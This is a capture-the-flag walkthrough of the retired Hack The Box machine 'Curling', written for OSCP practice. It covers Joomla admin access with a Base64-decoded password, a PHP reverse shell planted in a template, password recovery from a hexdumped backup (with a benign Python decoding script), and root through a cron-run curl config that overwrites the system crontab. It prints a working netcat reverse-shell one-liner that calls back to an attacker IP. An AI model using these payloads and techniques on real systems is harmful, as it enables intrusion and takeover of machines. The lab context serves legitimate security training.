OSCP PREPARATIONS – HTB Curling

Curling is a retired Linux machine on Hack The Box. The user and root flags are obtained through the weaknesses found during enumeration.
First we run a classic scan, a full TCP and UDP port scan, to get to know the machine.

According to the scan result, ports 22 and 80 are open.
Since port 80 is open, we first open the site in the browser.
We see that the website is built on the Joomla CMS (Content Management System).

Looking at the page source, near the end of the body section we find a reference to secret.txt.

We request that path to check whether secret.txt exists. It does, and it contains only this string:
Q3VybGluZzIwMTgh
At first glance we do not recognize what it is.

We paste it into CyberChef and use the Magic operation to identify it.

It appears to be Base64; decoding it gives Curling2018!

This looks like a password, so we note it and continue enumerating.
We run a directory scan with Gobuster.

We get a detailed list of directories and take note of them.

Since the website runs Joomla, we also scan it with the joomscan tool.

This identifies further useful directories.
We continue enumerating through the website itself. Browsing the blog-style posts, the name "Floris" catches our eye; we suspect this is a username on the box, note it, and continue.

We go to the administrator directory (the Joomla admin login) found during the directory scan.

We try to log in with the username and password we collected and succeed (Floris:Curling2018!).

We now control the Joomla administration panel. From here we can add a shell and run our commands, so we look for a place where a shell can be written.
Under Extensions > Templates > Templates we see that we can add a PHP file to a template. Since template files are served by the web server, a reverse shell placed there will execute when we browse to it.

We click Create, give the file a name and a .php extension, and use the netcat reverse shell one-liner from https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet wrapped in PHP (system() is used here; any PHP command-execution function works). 10.10.14.7 is our attacking machine and 1234 the port we will listen on:
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 1234 >/tmp/f');
?>

We save the file and start a netcat listener on port 1234 (nc -lvnp 1234).

We then browse to the PHP file we wrote in the template directory, which executes it.

We get our reverse shell. It runs as www-data, a user with very limited privileges; we cannot even read the user flag.

We keep getting permission denied errors.
However, we can read a file named password_backup. Thinking it holds a password, we open it: it is clearly a hexdump. We convert it back to binary with CyberChef, run file on the result, and decompress it with the matching tool; the output is itself compressed, so we repeat file and decompression until the original file appears.

With CyberChef we recover the password 5d<wdCbdZu)|hChXll and immediately try it over SSH for the user floris.
The login succeeds.
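The same recovery can be scripted instead of clicking through CyberChef. The following is an added example, not code from the original write-up: it reverses an xxd-style hexdump, peels compression layers by their magic bytes, and extracts the tar archive at the bottom. The sample backup it processes is constructed inside the script (a tar archive compressed bzip2, then gzip, then bzip2, then dumped as hex), so it runs offline; the real password_backup on the box has its own layering and content.

```python
#!/usr/bin/env python3
"""Reverse an xxd-style hexdump and peel nested compression layers.

Added example, not part of the original write-up. The sample below is
constructed here; it only stands in for the real password_backup file.
"""
import bz2
import gzip
import io
import tarfile


def from_hexdump(text: str) -> bytes:
    """Reverse an xxd-style hexdump ("offset: 4142 4344 ...  AB.."), like xxd -r."""
    out = bytearray()
    for line in text.splitlines():
        if ":" not in line:
            continue
        # The hex groups sit between the offset's colon and the double space
        # that introduces the ASCII column; short final lines are space-padded.
        hex_part = line.partition(":")[2].split("  ", 1)[0]
        out += bytes.fromhex(hex_part.replace(" ", ""))
    return bytes(out)


def to_hexdump(data: bytes) -> str:
    """Produce xxd-style output; used only to build the constructed sample."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        groups = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        ascii_col = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {groups.ljust(39)}  {ascii_col}")
    return "\n".join(lines) + "\n"


def peel(data: bytes) -> tuple[list[str], dict[str, bytes]]:
    """Strip compression layers by magic bytes until a tar archive (or raw data) remains.

    Returns the layer names in the order they were removed and the files found.
    """
    layers: list[str] = []
    while True:
        if data[:3] == b"BZh":                 # bzip2 magic
            layers.append("bzip2")
            data = bz2.decompress(data)
        elif data[:2] == b"\x1f\x8b":          # gzip magic
            layers.append("gzip")
            data = gzip.decompress(data)
        elif data[257:262] == b"ustar":        # tar (ustar) magic at offset 257
            layers.append("tar")
            with tarfile.open(fileobj=io.BytesIO(data)) as tf:
                files = {m.name: tf.extractfile(m).read()
                         for m in tf.getmembers() if m.isfile()}
            return layers, files
        else:                                  # nothing recognised: hand back raw bytes
            return layers, {"<raw>": data}


def build_sample_hexdump() -> str:
    """Constructed stand-in for password_backup: tar -> bzip2 -> gzip -> bzip2 -> hexdump."""
    payload = b"hypothetical-password\n"       # constructed, not the box's real password
    tar_buf = io.BytesIO()
    with tarfile.open(fileobj=tar_buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))
    blob = bz2.compress(gzip.compress(bz2.compress(tar_buf.getvalue())))
    return to_hexdump(blob)


def recover(hexdump_text: str) -> tuple[list[str], dict[str, bytes]]:
    """Full pipeline: hexdump text -> bytes -> peeled layers -> extracted files."""
    return peel(from_hexdump(hexdump_text))


if __name__ == "__main__":
    layers, files = recover(build_sample_hexdump())
    print("layers removed:", " -> ".join(layers))
    for name, content in files.items():
        print(f"{name}: {content.decode(errors='replace').strip()}")
```

On a real target the same loop is what the repeated `file` and decompress steps do by hand; the script just keys on the magic bytes (`BZh` for bzip2, `1f 8b` for gzip, `ustar` at offset 257 for tar) instead of the `file` output.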

Let's read our user flag.

Now we try to escalate from the floris user to root, so we enumerate again.

We cannot access the root directory.
During enumeration the admin-area directory stands out. Inside it are two files named input and report. Notably they are owned by root, yet floris can read and edit them.

We continue enumerating. We want to watch the processes running in the background with pspy (it lets us see processes such as cron jobs without needing root privileges).
We transfer the pspy binary from our attacking machine to the target.

Then we run it on the target.

From the cron job we understand that root runs curl with the input file as its configuration file (-K / --config) and writes the response to report (-o).
ls -la shows the input file belongs to our group, so we can write our own configuration into it. A curl config file can also set the output file with the output option, so we can make root's curl download a crontab we control and write it over the system crontab.
To confirm this, we check how the -K option and the config file syntax work with man curl.

As we see there, the config file can name the URL to fetch and the file to write it to, and since curl runs as root it can write anywhere.
So the plan: create a cron entry that spawns a reverse shell, have root's curl job fetch it and drop it into place, and collect a root shell.
First we create the crontab file containing the reverse shell entry.
We prepare it on our own machine.

Our crontab file for the reverse shell is ready.
Next we edit the input file on the target with nano, setting url to our web server and output to the crontab path.

With the input file edited, it is time to serve the crontab from a web server on our machine and listen for the reverse shell with netcat in the background.

Root's cron job fetches our file.
And our reverse shell comes back as root 😊
